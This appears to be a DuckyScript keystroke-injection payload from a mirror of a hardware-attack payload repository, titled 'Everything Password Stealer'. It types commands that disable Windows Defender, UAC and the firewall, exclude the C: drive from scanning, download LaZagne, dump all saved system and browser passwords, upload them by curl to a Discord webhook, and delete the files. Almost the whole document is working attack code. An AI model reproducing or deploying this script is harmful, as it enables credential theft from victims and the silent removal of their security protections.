mirror of https://github.com/hak5/omg-payloads.git
73 lines
2.0 KiB
Plaintext
73 lines
2.0 KiB
Plaintext
REM Title: Everything Password Stealer
|
|
REM Description: Steals every password in every windows 10 or 11 passwords with LaZagne
|
|
REM Bypasses UAC, Firewall, and Defender with persistence whatsoever
|
|
REM Exfil your data to your not-so private discord server with computer name as a filename (to avoid confusions as usual)
|
|
REM Author: DeadPool (just kidding, created by me, the one and only Spade)
|
|
|
|
GUI m
|
|
DELAY 2000
|
|
REM Open Windows Defender Settings
|
|
CTRL ESC
|
|
DELAY 750
|
|
STRING windows security
|
|
ENTER
|
|
DELAY 1500
|
|
ENTER
|
|
REM Navigate to Manage Settings
|
|
DELAY 500
|
|
TAB
|
|
DELAY 100
|
|
TAB
|
|
DELAY 100
|
|
TAB
|
|
DELAY 100
|
|
TAB
|
|
DELAY 100
|
|
ENTER
|
|
DELAY 500
|
|
REM Open and turn off Realtime Protection
|
|
SPACE
|
|
DELAY 1000
|
|
ALT y
|
|
DELAY 1000
|
|
REM Exit security settings
|
|
ALT F4
|
|
DELAY 3000
|
|
GUI r
|
|
DELAY 1000
|
|
REM Open the Powershell as Administrator
|
|
STRING powershell
|
|
CTRL-SHIFT ENTER
|
|
DELAY 2000
|
|
ALT y
|
|
ENTER
|
|
DELAY 1000
|
|
REM Disabling the UAC
|
|
STRING Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
|
|
ENTER
|
|
DELAY 1000
|
|
REM Disabling the Firewall Part 1
|
|
STRING Set-MpPreference -DisableRealtimeMonitoring $true
|
|
ENTER
|
|
DELAY 1000
|
|
REM Disabling the Firewall Part 2
|
|
STRING Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
|
|
ENTER
|
|
DELAY 1000
|
|
REM Disabling the Virus and Threat Protection
|
|
STRING New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
|
|
ENTER
|
|
DELAY 1000
|
|
STRING Add-MpPreference -ExclusionPath "C:"
|
|
ENTER
|
|
DELAY 3000
|
|
STRING $Test = [System.Environment]::GetEnvironmentVariable('TEMP','Machine');Start-BitsTransfer https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe -Destination "$Test/l.exe"; cd $Test
|
|
ENTER
|
|
DELAY 15000
|
|
STRING .\l.exe all -vv > "$env:computername.txt"; .\l.exe browsers -vv >> "$env:computername.txt"; curl.exe [DISCORD WEBHOOK URL] -F "file1=@$Test/$env:computername.txt"; Remove-Item "$x/$env:computername.txt", "$x/l.exe" -Force -ErrorAction SilentlyContinue
|
|
ENTER
|
|
STRING exit
|
|
ENTER
|
|
|
|
REM Done
|